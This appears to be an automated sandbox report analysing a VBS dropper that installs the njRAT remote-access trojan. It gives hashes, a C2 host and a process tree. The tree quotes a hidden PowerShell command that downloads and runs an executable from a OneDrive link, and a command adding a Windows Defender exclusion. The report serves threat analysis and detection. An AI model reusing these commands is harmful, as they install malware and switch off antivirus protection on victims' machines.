Analysis

  • max time kernel
    145s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-en
  • submitted
    15-09-2021 09:10

General

  • Target

    Zona de Pago.vbs

  • Size

    162KB

  • MD5

    df165c37e5339e9a1a720e593d8f2eb1

  • SHA1

    29f8959f9934a0a4f64bbdb3dbaa878334814fc4

  • SHA256

    282b7e31f3fff63d2f713d0841e75e52294bb6601454e78bfd9285839ec4a34a

  • SHA512

    277043fe7d52b876d3c8e04d0ae76f232a6e64774aeb89399c1e47952e82c65814e9004a0dcf1a824ca45ce52a05619b33fc7bcb9e33e740ecb83cc20b12b447

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21150&authkey=AKfJKvTWpXPaOuE

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

reald27.duckdns.org:3525

Mutex

f45dd4eb26

Attributes
  • reg_key

    f45dd4eb26

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Drops startup file 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Zona de Pago.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21150&authkey=AKfJKvTWpXPaOuE' ) -encoding byte -Path $env:appdata\Hostdyn.exe; Start-Process $env:appdata\Hostdyn.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1788
      • C:\Users\Admin\AppData\Roaming\Hostdyn.exe
        "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:660
        • C:\Users\Admin\AppData\Roaming\Hostdyn.exe
          "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1196

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Hostdyn.exe
    MD5

    0bb825d7755c400a76fd8512f6baab38

    SHA1

    278d3e2ca71d1b8f1e3b521e8885ae13e25d84da

    SHA256

    2543435084f6e995500f8e9f12312db2da5241029f78418a5308524e295443d9

    SHA512

    60bd692b834dd5280c93894adcfacde0d11cd0b7ae893a6b5a64cba704a13a0845f65bd322384d19e9eebf6a673a0565308f88769cc99eec4292c0ff2b980e34

  • C:\Users\Admin\AppData\Roaming\Hostdyn.exe
    MD5

    0bb825d7755c400a76fd8512f6baab38

    SHA1

    278d3e2ca71d1b8f1e3b521e8885ae13e25d84da

    SHA256

    2543435084f6e995500f8e9f12312db2da5241029f78418a5308524e295443d9

    SHA512

    60bd692b834dd5280c93894adcfacde0d11cd0b7ae893a6b5a64cba704a13a0845f65bd322384d19e9eebf6a673a0565308f88769cc99eec4292c0ff2b980e34

  • C:\Users\Admin\AppData\Roaming\Hostdyn.exe
    MD5

    0bb825d7755c400a76fd8512f6baab38

    SHA1

    278d3e2ca71d1b8f1e3b521e8885ae13e25d84da

    SHA256

    2543435084f6e995500f8e9f12312db2da5241029f78418a5308524e295443d9

    SHA512

    60bd692b834dd5280c93894adcfacde0d11cd0b7ae893a6b5a64cba704a13a0845f65bd322384d19e9eebf6a673a0565308f88769cc99eec4292c0ff2b980e34

  • memory/660-69-0x0000000000000000-mapping.dmp
  • memory/660-78-0x0000000002350000-0x0000000002F9A000-memory.dmp
    Filesize

    12.3MB

  • memory/660-77-0x0000000002350000-0x0000000002F9A000-memory.dmp
    Filesize

    12.3MB

  • memory/660-76-0x0000000002350000-0x0000000002F9A000-memory.dmp
    Filesize

    12.3MB

  • memory/660-75-0x00000000766B1000-0x00000000766B3000-memory.dmp
    Filesize

    8KB

  • memory/1196-79-0x0000000004CE0000-0x0000000004CE1000-memory.dmp
    Filesize

    4KB

  • memory/1196-73-0x0000000000400000-0x000000000040C000-memory.dmp
    Filesize

    48KB

  • memory/1196-71-0x000000000040676E-mapping.dmp
  • memory/1196-70-0x0000000000400000-0x000000000040C000-memory.dmp
    Filesize

    48KB

  • memory/1380-66-0x00000000004D0000-0x00000000004D7000-memory.dmp
    Filesize

    28KB

  • memory/1380-67-0x0000000004FE0000-0x0000000005037000-memory.dmp
    Filesize

    348KB

  • memory/1380-68-0x0000000000B10000-0x0000000000B32000-memory.dmp
    Filesize

    136KB

  • memory/1380-65-0x0000000000990000-0x0000000000991000-memory.dmp
    Filesize

    4KB

  • memory/1380-63-0x00000000010B0000-0x00000000010B1000-memory.dmp
    Filesize

    4KB

  • memory/1380-60-0x0000000000000000-mapping.dmp
  • memory/1788-59-0x000000000265B000-0x000000000267A000-memory.dmp
    Filesize

    124KB

  • memory/1788-57-0x0000000002652000-0x0000000002654000-memory.dmp
    Filesize

    8KB

  • memory/1788-55-0x000007FEF37E0000-0x000007FEF433D000-memory.dmp
    Filesize

    11.4MB

  • memory/1788-58-0x0000000002654000-0x0000000002657000-memory.dmp
    Filesize

    12KB

  • memory/1788-56-0x0000000002650000-0x0000000002652000-memory.dmp
    Filesize

    8KB

  • memory/1788-53-0x0000000000000000-mapping.dmp
  • memory/1868-52-0x000007FEFC401000-0x000007FEFC403000-memory.dmp
    Filesize

    8KB